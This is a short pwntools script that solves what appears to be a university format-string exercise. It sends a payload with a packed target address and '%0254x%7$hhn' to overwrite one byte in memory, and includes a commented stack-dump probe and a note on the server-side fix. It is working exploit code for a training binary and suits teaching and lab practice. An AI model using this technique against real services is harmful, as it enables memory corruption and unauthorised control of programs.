from pwn import remote, process, p32
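# Remote endpoint of the format-string exercise this script talks to.
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
PORT = 25195

conn = remote(HOST, PORT)
# Local alternative to the remote connection, kept for debugging:
#conn = process("05_write_specific_byte")
# Pause before sending; presumably used to attach a debugger to the local process.
#input()

# Address of the one byte to overwrite: offset +3 from 0x804c044, packed as a
# 32-bit little-endian value. Presumably the most significant byte of a 32-bit
# variable stored at 0x804c044 (the binary is not shown here; confirm).
tgt_addr = p32(0x804c044+3)

# %hhn stores the low 8 bits of the count of characters printed so far.
# 4 bytes (packed address) + 254 (zero-padded %x) = 258 = 0x102, so 0x02 is stored.
#2 + 256 - 4(ptr) = 254
# %7$ selects the 7th printf argument, which is expected to be the first four
# bytes of this payload (the offset the commented-out probe below is for).
#
# NOTE(review): this only works if the service passes client input to a
# printf-family call as the format string. The fix on the service side is a
# constant format, e.g. printf("%s", buf); -Wformat-security flags the pattern
# at build time and _FORTIFY_SOURCE=2 makes glibc abort on %n in a writable
# format string.
pl = tgt_addr+b"%0254x%7$hhn\n"
# Stack-dump probe: prints successive stack words to find the argument index
# at which the "AAAA" marker (0x41414141) shows up.
#pl = "AAAA.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x.%08x\n"

conn.send(pl)

# Stream the reply one byte at a time until the peer closes the connection.
# recv() raises EOFError once the connection is closed and nothing is left to
# read, so that is the normal way out of this loop. Polling conn.connected()
# instead may end the loop while received bytes are still buffered.
try:
    while True:
        chunk = conn.recv(1)
        if not chunk:
            # Empty read (timeout): nothing to print yet, keep waiting.
            continue
        print(chr(chunk[0]), end="", flush=True)
except EOFError:
    pass
finally:
    # Always release the socket, including on Ctrl-C.
    conn.close()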